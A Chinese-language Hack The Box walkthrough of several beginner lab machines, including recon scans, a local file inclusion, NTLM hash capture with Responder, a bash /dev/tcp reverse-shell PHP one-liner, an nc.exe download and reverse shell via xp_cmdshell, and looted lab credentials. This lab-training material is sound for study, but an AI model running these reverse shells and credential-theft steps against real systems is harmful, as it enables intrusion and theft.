HTB 的 Very easy 靶机，用来帮助熟悉 Hack The Box 的基础操作和一些靶机的基础环节设置，以及一些基础知识的补充

Start Point

Web_Nmap_smb

redis_cli

How to install redis-cli? redis-cli could be installed by sudo apt-get install redis-tools which contains redis-cli.After we connect redis server, INFO will help us to get the information about database. Beside, keys * could get all keys and get 'key' could get value of key

┌──(kali㉿kali)-[/usr]
└─$ redis-cli -h
redis-cli 7.0.11

Usage: redis-cli [OPTIONS] [cmd [arg [arg ...]]]
  -h <hostname>      Server hostname (default: 127.0.0.1).
  -p <port>          Server port (default: 6379).
  -s <socket>        Server socket (overrides hostname and port).
  -a <password>      Password to use when connecting to the server.
                     You can also use the REDISCLI_AUTH environment
                     variable to pass this password more safely
                     (if both are used, this argument takes precedence).
  --user <username>  Used to send ACL style 'AUTH username pass'. Needs -a.
  --pass <password>  Alias of -a for consistency with the new --user option.
  --askpass          Force user to input password with mask from STDIN.
                     If this argument is used, '-a' and REDISCLI_AUTH
                     environment variable will be ignored.
  -u <uri>           Server URI.
  -r <repeat>        Execute specified command N times.
  -i <interval>      When -r is used, waits <interval> seconds per command.
                     It is possible to specify sub-second times like -i 0.1.
                     This interval is also used in --scan and --stat per cycle.
                     and in --bigkeys, --memkeys, and --hotkeys per 100 cycles.
  -n <db>            Database number.
  -2                 Start session in RESP2 protocol mode.
  -3                 Start session in RESP3 protocol mode.
  -x                 Read last argument from STDIN (see example below).
  -X                 Read <tag> argument from STDIN (see example below).
  -d <delimiter>     Delimiter between response bulks for raw formatting (default: \n).
  -D <delimiter>     Delimiter between responses for raw formatting (default: \n).
  -c                 Enable cluster mode (follow -ASK and -MOVED redirections).
  -e                 Return exit error code when command execution fails.
  --tls              Establish a secure TLS connection.
  --sni <host>       Server name indication for TLS.
  --cacert <file>    CA Certificate file to verify with.
  --cacertdir <dir>  Directory where trusted CA certificates are stored.
                     If neither cacert nor cacertdir are specified, the default
                     system-wide trusted root certs configuration will apply.
  --insecure         Allow insecure TLS connection by skipping cert validation.
  --cert <file>      Client certificate to authenticate with.
  --key <file>       Private key file to authenticate with.
  --tls-ciphers <list> Sets the list of preferred ciphers (TLSv1.2 and below)
                     in order of preference from highest to lowest separated by colon (":").
                     See the ciphers(1ssl) manpage for more information about the syntax of this string.
  --tls-ciphersuites <list> Sets the list of preferred ciphersuites (TLSv1.3)
                     in order of preference from highest to lowest separated by colon (":").
                     See the ciphers(1ssl) manpage for more information about the syntax of this string,
                     and specifically for TLSv1.3 ciphersuites.
  --raw              Use raw formatting for replies (default when STDOUT is
                     not a tty).
  --no-raw           Force formatted output even when STDOUT is not a tty.
  --quoted-input     Force input to be handled as quoted strings.
  --csv              Output in CSV format.
  --json             Output in JSON format (default RESP3, use -2 if you want to use with RESP2).
  --quoted-json      Same as --json, but produce ASCII-safe quoted strings, not Unicode.
  --show-pushes <yn> Whether to print RESP3 PUSH messages.  Enabled by default when
                     STDOUT is a tty but can be overridden with --show-pushes no.
  --stat             Print rolling stats about server: mem, clients, ...
  --latency          Enter a special mode continuously sampling latency.
                     If you use this mode in an interactive session it runs
                     forever displaying real-time stats. Otherwise if --raw or
                     --csv is specified, or if you redirect the output to a non
                     TTY, it samples the latency for 1 second (you can use
                     -i to change the interval), then produces a single output
                     and exits.
  --latency-history  Like --latency but tracking latency changes over time.
                     Default time interval is 15 sec. Change it using -i.
  --latency-dist     Shows latency as a spectrum, requires xterm 256 colors.
                     Default time interval is 1 sec. Change it using -i.
  --lru-test <keys>  Simulate a cache workload with an 80-20 distribution.
  --replica          Simulate a replica showing commands received from the master.
  --rdb <filename>   Transfer an RDB dump from remote server to local file.
                     Use filename of "-" to write to stdout.
 --functions-rdb <filename> Like --rdb but only get the functions (not the keys)
                     when getting the RDB dump file.
  --pipe             Transfer raw Redis protocol from stdin to server.
  --pipe-timeout <n> In --pipe mode, abort with error if after sending all data.
                     no reply is received within <n> seconds.
                     Default timeout: 30. Use 0 to wait forever.
  --bigkeys          Sample Redis keys looking for keys with many elements (complexity).
  --memkeys          Sample Redis keys looking for keys consuming a lot of memory.
  --memkeys-samples <n> Sample Redis keys looking for keys consuming a lot of memory.
                     And define number of key elements to sample
  --hotkeys          Sample Redis keys looking for hot keys.
                     only works when maxmemory-policy is *lfu.
  --scan             List all keys using the SCAN command.
  --pattern <pat>    Keys pattern when using the --scan, --bigkeys or --hotkeys
                     options (default: *).
  --quoted-pattern <pat> Same as --pattern, but the specified string can be
                         quoted, in order to pass an otherwise non binary-safe string.
  --intrinsic-latency <sec> Run a test to measure intrinsic system latency.
                     The test will run for the specified amount of seconds.
  --eval <file>      Send an EVAL command using the Lua script at <file>.
  --ldb              Used with --eval enable the Redis Lua debugger.
  --ldb-sync-mode    Like --ldb but uses the synchronous Lua debugger, in
                     this mode the server is blocked and script changes are
                     not rolled back from the server memory.
  --cluster <command> [args...] [opts...]
                     Cluster Manager command and arguments (see below).
  --verbose          Verbose mode.
  --no-auth-warning  Don\'t show warning message when using password on command
                     line interface.
  --help             Output this help and exit.
  --version          Output version and exit.

Cluster Manager Commands:
  Use --cluster help to list all available cluster manager commands.

Examples:
  cat /etc/passwd | redis-cli -x set mypasswd
  redis-cli -D "" --raw dump key > key.dump && redis-cli -X dump_tag restore key2 0 dump_tag replace < key.dump
  redis-cli -r 100 lpush mylist x
  redis-cli -r 100 -i 1 info | grep used_memory_human:
  redis-cli --quoted-input set '"null-\x00-separated"' value
  redis-cli --eval myscript.lua key1 key2 , arg1 arg2 arg3
  redis-cli --scan --pattern '*:12345*'

  (Note: when using --eval the comma separates KEYS[] from ARGV[] items)

When no command is given, redis-cli starts in interactive mode.
Type "help" in interactive mode for information on available commands
and settings.

Responder

信息收集

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.237.187
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 03:00 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 47.32% done; ETC: 03:00 (0:00:10 remaining)
Nmap scan report for unika.htb (10.129.237.187)
Host is up (0.20s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
5985/tcp open  wsman
7680/tcp open  pando-pub

Nmap done: 1 IP address (1 host up) scanned in 27.09 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p80,5985,7680 10.129.237.187
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 03:02 EDT
Nmap scan report for unika.htb (10.129.237.187)
Host is up (0.067s latency).

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Unika
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.15 seconds

Windows远程管理（WinRM默认运行在5985端口），是一个Windows本地内置的远程管理协议，基本上使用简单对象访问协议与远程计算机和服务器交互，以及操作系统和应用程序。

在浏览器中，访问 IP 发现被重定向到了 unika.htb，于是在/etc/hosts 文件中添加 IP unika.htb 的对应，这样我们就可以直接访问 unika.htb 页面了，发现页面中很多都是锚点，在切换语言的位置发现

Web 渗透

看到这个 URL，应当考虑是否存在本地文件包含和远程文件包含漏洞，我们构造 …/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts 将其作为 page 参数的值

发现的确存在本地包含漏洞，接下来尝试是否存在远程文件包含漏洞，因为前面已经确定了是 Windows 的机器（nmap 扫描），所以接下来我们将使用 Responder 来获取 NTLM 的值

在PHP配置文件PHP.ini中:
“allow_url_include”默认设置为“Off”,PHP不加载远程HTTP或FTP,url以防止远程文件包含攻击。
然而，即使allow_url_include和allow_url_fopen被设置为“Off”，PHP也不会阻止加载SMB url。
我们可以误用这个功能来窃取NTLM哈希

Responder 可以进行许多不同类型的攻击，但对于这个场景，它将设置为一个恶意的 SMB 服务器。
当目标机器试图对该服务器执行NTLM身份验证时，Responder向服务器发送一个请求，要求服务器用用户的密码加密。当服务器响应时，Responder将使用质询和加密的响应来生成NetNTLMv2（NetNTLMv2质询/响应是一个特定格式化的字符串，包括质询和响应。）而我们不能逆转在NetNTLMv2中，我们可以尝试许多不同的常见密码，以查看是否有任何密码生成相同的质询响应，如果找到了，我们就知道这就是密码。这通常被称为散列破解，我们将使用一个名为“John The Ripper”的程序来实现。

Responder 获取 NTLM 认证中的密码哈希值

./Responder.py -I tun0

接下来我们复制以上内容使用 john 进行破解操作

最后使用 evil-winrm 来连接

evil-winrm -i IP -u administrator -p badminton

最后在 mike 的桌面找到了 flag

Three

Three is a Linux box that includes a website, which utilizes an AWS S3 bucket as its cloud-storage device. We can exploit this poorly configured S3 bucket and upload a reverse shell on it. We can then visit the corresponding URL to execute the reverse file and ultimately retrieve the flag.

基础的信息收集发现，在 CONTACT 中有一个邮箱地址，邮箱的后缀使用的是 thetoppers.htb，我们把 thetoppers.htb 和 IP 的对应写入 hosts 文件。

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.227.248
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 22:00 EDT
Warning: 10.129.227.248 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.227.248
Host is up (0.020s latency).
Not shown: 65284 closed tcp ports (reset), 249 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 23.96 seconds

尝试子域名爆破

┌──(i3eg1nner㉿minilite)-[~]
└─$ wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u thetoppers.htb -H "Host:FUZZ.thetoppers.htb" --hw 1036
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz\'s documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://thetoppers.htb/
Total requests: 5000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000247:   404        0 L      2 W        21 Ch       "s3"
000000690:   400        10 L     35 W       306 Ch      "gc._msdcs"
000002700:   400        10 L     35 W       306 Ch      "m."
000002795:   400        10 L     35 W       306 Ch      "ns2.cl.bellsouth.net."
000002883:   400        10 L     35 W       306 Ch      "ns1.viviotech.net."
000002885:   400        10 L     35 W       306 Ch      "ns2.viviotech.net."
000003050:   400        10 L     35 W       306 Ch      "ns3.cl.bellsouth.net."
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 3066
Filtered Requests: 3059
Requests/sec.: 0

得到一个 s3 的子域名，虽然返回的是 404，但是也应当引起注意，借助于谷歌搜索发现，s3 是亚马逊的存储服务，然后把 s3.thetoppers.htb 和 IP 的对应也写入 hosts 文件。

┌──(i3eg1nner㉿minilite)-[~]
└─$ curl s3.thetoppers.htb
{"status": "running"}

接下来我们需要借助于工具 awscli 来和 s3.thetoppers.htb 进行交互。通过 apt-get 安装完 awscli（或者 aws）之后首先应当使用 aws configure 进行参数的配置（随便写就行），这样我们才能和目标进行交互。

使用 aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb 来列出所有的存储对象

┌──(i3eg1nner㉿minilite)-[~]
└─$ aws s3 cp hash s3://s3.thetoppers.htb/
upload failed: ./hash to s3://s3.thetoppers.htb/hash Could not connect to the endpoint URL: "https://s3.temp.amazonaws.com/s3.thetoppers.htb/hash"

┌──(i3eg1nner㉿minilite)-[~]
└─$ aws --endpoint=http://s3.thetoppers.htb s3 ls  s3://thetoppers.htb
                           PRE images/
2023-06-01 22:17:08          0 .htaccess
2023-06-01 22:17:08      11952 index.php

既然如此，接下来我们就使用 cp 命令借助于 aws s3 的机制来实现文件上传。一开始上传了这样的反向 shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'"); ?>

但是出现了问题：连接上之后就立马断开了，再尝试尝试经典的 php 反向 shell 吧

┌──(i3eg1nner㉿minilite)-[~]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php ./

┌──(i3eg1nner㉿minilite)-[~]
└─$ vim  php-reverse-shell.php

┌──(i3eg1nner㉿minilite)-[~]
└─$ aws --endpoint=http://s3.thetoppers.htb s3 cp php-reverse-shell.php s3://thetoppers.htb
upload: ./php-reverse-shell.php to s3://thetoppers.htb/php-reverse-shell.php

┌──(i3eg1nner㉿minilite)-[~]
└─$ aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
                           PRE images/
2023-06-01 22:17:08          0 .htaccess
2023-06-01 22:17:08      11952 index.php
2023-06-01 23:32:09       5494 php-reverse-shell.php
2023-06-01 23:19:09         31 shell.php
2023-06-01 23:27:06         80 shellre.php

通过 curl 去访问，反弹 shell 成功，后面就进行简单的信息收集，在 www 目录下发现了flag.txt

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.109] from (UNKNOWN) [10.129.227.248] 38080
Linux three 4.15.0-189-generic #200-Ubuntu SMP Wed Jun 22 19:53:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 03:32:52 up  1:33,  0 users,  load average: 0.00, 0.00, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@three:/$ uname -a
uname -a
Linux three 4.15.0-189-generic #200-Ubuntu SMP Wed Jun 22 19:53:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
www-data@three:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:ac:02 brd ff:ff:ff:ff:ff:ff
    inet 10.129.227.248/16 brd 10.129.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:ac02/64 scope global dynamic mngtmpaddr
       valid_lft 86391sec preferred_lft 14391sec
    inet6 fe80::250:56ff:feb9:ac02/64 scope link
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:2d:2f:a4:be brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
4: br-2de548fc06bf: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:f6:13:a4:fd brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-2de548fc06bf
       valid_lft forever preferred_lft forever
    inet6 fe80::42:f6ff:fe13:a4fd/64 scope link
       valid_lft forever preferred_lft forever
6: veth1c9ddaf@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2de548fc06bf state UP group default
    link/ether 8e:19:6f:3f:9d:5f brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::8c19:6fff:fe3f:9d5f/64 scope link
       valid_lft forever preferred_lft forever
www-data@three:/$ pwd
pwd
/
www-data@three:/$ ls
ls
bin   etc         initrd.img.old  lost+found  opt   run   sys  var
boot  home        lib             media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64           mnt         root  srv   usr  vmlinuz.old
www-data@three:/$ cd /root
cd /root
bash: cd: /root: Permission denied
www-data@three:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@three:/$ cd /var/www
cd /var/www
www-data@three:/var/www$ ls
ls
flag.txt  html
www-data@three:/var/www$ cat flag.txt
cat flag.txt
a980d99281a28d638ac68b9bf9453c2b

Archetype

信息收集

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.142.66
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 04:06 EDT
Warning: 10.129.142.66 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.142.66
Host is up (0.031s latency).
Not shown: 65135 closed tcp ports (reset), 388 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

smb 信息收集

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 10.129.142.66
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 04:09 EDT
Nmap scan report for 10.129.142.66
Host is up (0.0094s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.129.142.66\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.129.142.66\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.129.142.66\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.129.142.66\backups:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: READ
|_    Current user access: READ

Nmap done: 1 IP address (1 host up) scanned in 28.35 seconds

smb 登录

┌──(i3eg1nner㉿minilite)-[~]
└─$ smbclient //10.129.142.66/backups
Password for [WORKGROUP\i3eg1nner]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

                5056511 blocks of size 4096. 2609591 blocks available
smb: \> help
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            deltree        dir
du             echo           exit           get            getfacl
geteas         hardlink       help           history        iosize
lcd            link           lock           lowercase      ls
l              mask           md             mget           mkdir
more           mput           newer          notify         open
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir
posix_unlink   posix_whoami   print          prompt         put
pwd            q              queue          quit           readlink
rd             recurse        reget          rename         reput
rm             rmdir          showacls       setea          setmode
scopy          stat           symlink        tar            tarmode
timeout        translate      unlock         volume         vuid
wdel           logon          listconnect    showconnect    tcon
tdis           tid            utimes         logoff         ..
!
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (35.0 KiloBytes/sec) (average 35.0 KiloBytes/sec)

┌──(i3eg1nner㉿minilite)-[~]
└─$ cat prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

mssql 渗透

发现了用户名和密码，并且用户名中有 sql 关键字，而端口扫描的结果显示，靶机开启了 mssql。因此尝试登录，使用的工具是impacket-mssqlclient

┌──(i3eg1nner㉿minilite)-[~]
└─$ impacket-mssqlclient -windows-auth sql_svc@10.129.142.66
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd

使用以下命令进行判断

SELECT is_srvrolemember('sysadmin');

发现确实有权限，那接下来要获取命令执行的权限

EXEC xp_cmdshell 'net user'; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default: 
EXEC sp_configure 'show advanced options', 1; — priv 
RECONFIGURE; — priv 
EXEC sp_configure 'xp_cmdshell', 1; — priv 
RECONFIGURE; — priv

也可以使用工具中自带的功能，它会给出一定的指引

接下来我们就可以使用 xp_cmdshell 来执行命令了，我们开始考虑如何反弹 shell，首先在机器上上传 nc.exe 文件，然后利用 nc 反弹 shell。

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.9 443

┌──(i3eg1nner㉿minilite)-[/usr/share/windows-resources/binaries]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.109] from (UNKNOWN) [10.129.142.66] 49677
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\Downloads

06/02/2023  01:48 AM    <DIR>          .
06/02/2023  01:48 AM    <DIR>          ..
06/02/2023  01:45 AM            59,392 nc.exe
06/02/2023  01:48 AM            59,392 nc64.exe
               2 File(s)        118,784 bytes
               2 Dir(s)  10,717,417,472 bytes free

C:\Users\sql_svc\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,717,413,376 bytes free

C:\Users\sql_svc\Desktop>type user.txt

查看 powshell 历史的文件，找到了用户名和密码

    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    C:\Users\Default\NTUSER.DAT
    C:\Users\sql_svc\NTUSER.DAT

▒▒▒▒▒▒▒▒▒▒͹ Analyzing Other Windows Files Files (limit 70)

       /---------------------------------------------------------------------------\
       |                             Do you like PEASS?                            |
       |---------------------------------------------------------------------------|
       |         Become a Patreon    :     https://www.patreon.com/peass           |
       |         Follow on Twitter   :     @carlospolopm                           |
       |         Respect on HTB      :     SirBroccoli & makikvues                 |
       |---------------------------------------------------------------------------|
       |                                 Thank you!                                |
       \---------------------------------------------------------------------------/

PS C:\Users\sql_svc\Downloads> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

最后使用 impacket-psexec 来连接 administrator

┌──(i3eg1nner㉿minilite)-[~/tools/windows]
└─$ impacket-psexec administrator@10.129.142.66
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.129.142.66.....
[*] Found writable share ADMIN$
[*] Uploading file baWlxTKg.exe
[*] Opening SVCManager on 10.129.142.66.....
[*] Creating service Waku on 10.129.142.66.....
[*] Starting service Waku.....
[!] Press help for extra shell commands                                                                                                                                                                                                Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd "C:\Users\Administrator\Desktop"
C:\Users\Administrator\Desktop> dir                                                                                                                                                                                                     Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\Administrator\Desktop

07/27/2021  02:30 AM    <DIR>          .
07/27/2021  02:30 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,688,098,304 bytes free

C:\Users\Administrator\Desktop> type root.txt 

Oopsie

信息收集

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.129.95.191
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 22:23 EDT
Warning: 10.129.95.191 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.95.191
Host is up (0.057s latency).
Not shown: 65011 closed tcp ports (reset), 522 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 28.72 seconds

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap -sT -sV -sC -p22,80 10.129.95.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 22:24 EDT
Nmap scan report for 10.129.95.191
Host is up (0.0036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61e43fd41ee2b2f10d3ced36283667c7 (RSA)
|   256 241da417d4e32a9c905c30588f60778d (ECDSA)
|_  256 78030eb4a1afe5c2f98d29053e29c9f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds

可以判断出的内容：Ubuntu 系统、Apache 搭建，开放了 22 和 80 端口

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo nmap --script=vuln -p22,80 10.129.95.191
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 22:25 EDT
Nmap scan report for 10.129.95.191
Host is up (0.0033s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
| http-internal-ip-disclosure:
|_  Internal IP Leaked: 127.0.1.1
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 32.10 seconds

Web 渗透

nmap 自带的漏扫没什么有价值的信息，看一看浏览器端吧

翻了翻似乎没什么有效的点击按钮，F12 看看

似乎看到了登录的地址

Wappalyzer 的结果显示这是 php 搭建的页面（在源码中也能看到），没有后台管理的产品名称，不过有个游客登陆的选项，点进去看看

修改cookies

进入之后发现了 uploads 选项，那就尝试点进去吧。上传界面提示仅限 super admin 才有操作权限

看一眼控制台，原来它是靠 cookies 来判断游客和管理员的，点击账户发现，看到了如下内容

这里观察 URL 发现：id=2，那我们肯定要试试直接修改 URL，会有什么样的结果

文件上传

拿到了管理员的 id，那我们直接修改 cookie 试试看，修改后应该可以直接访问上传文件的界面

确实可以上传文件了，我们直接使用 php reverse shell，修改其中的 ip，那接下来的问题是，上传文件后怎么访问，也就是上传后的文件路径，目录爆破一下吧

┌──(i3eg1nner㉿minilite)-[~]
└─$ sudo gobuster dir -u http://10.129.95.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[sudo] password for i3eg1nner:
===============================================================
